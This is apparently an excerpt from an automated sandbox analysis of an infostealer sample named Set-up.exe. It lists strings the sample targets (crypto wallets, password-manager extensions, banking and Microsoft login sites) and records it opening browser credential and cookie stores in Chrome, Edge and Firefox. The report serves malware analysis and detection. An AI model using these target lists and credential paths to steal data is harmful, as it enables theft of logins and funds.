Binary or memory string: .node-rednode_modules.quokkaMPC-HCMPC-BEPotPlayerMiniDaumVMwareCCleanerBrowser.exeD:G:I:F:H:C:DewMobileBorisFXInnovative SolutionsimloifkgjagghnncjkhggdhalmcnfklkbackupMultiBitHDwalletsleveldbrecoveryIntel(R)Microsoft_CorporationGoogle Web DesignerDevice MetadataWindows MailK-MeleonVSCommonvshubVS Revo Group@trezorLedger LiveMarc Gravell.tlauncherjvmsjava(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0Opera GXDefaultOpera CryptoOpera DeveloperOperaOpera UnknownOpera Beta/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATOR(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0WebStorageVideoDecodeStatsoptimization_guide_prediction_model_downloads4kdownload.com\bluestacks-services\atomic\AMD |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2154640438.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.000000000193E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.0000000001983000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696428655x |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_0001116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, |
5_2_0001116C |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_00011160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, |
5_2_00011160 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_000111A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, |
5_2_000111A3 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_000113C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, |
5_2_000113C9 |
Source: Set-up.exe |
String found in binary or memory: \Electrum-btcp\wallets |
Source: Set-up.exe |
String found in binary or memory: \ElectronCash\wallets |
Source: Set-up.exe, 00000000.00000000.2043681328.00000000017D7000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: OlkOxygen - Atomic Crypto WalletYoroiPolkadot{.js} extensionSolflare WalletSui WalletBitwarden - Free Password ManagerLastPass - Free Password ManagerEnkrypt - Multichain Crypto WalletRabby WalletAuthyCrypto.com - Wallet ExtensionZilPayExodus Web3 WalletTrust WalletMartian Aptos & Sui Wallet ExtensionOKX WalletAuthenticatorBackpackXverse WalletUniSat WalletTonkeeper - wallet for TONSafePal Extension WalletKeplrTemple - Tezos WalletMEW CXJaxx LibertyGuarda WalletSollet WalletTrezor Password ManagerUnknown Wallet\Ledger Live\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)RAM: Data (Time): CPU: Installed Apps: |
Source: Set-up.exe |
String found in binary or memory: Jaxx Liberty |
Source: Set-up.exe |
String found in binary or memory: \Exodus\backup |
Source: Set-up.exe |
String found in binary or memory: Exodus Web3 Wallet |
Source: Set-up.exe |
String found in binary or memory: Ethereum (UTC) |
Source: C:\Users\user\Desktop\Set-up.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db |
Jump to behavior |
Source: C:\Users\user\Desktop\Set-up.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies |
Jump to behavior |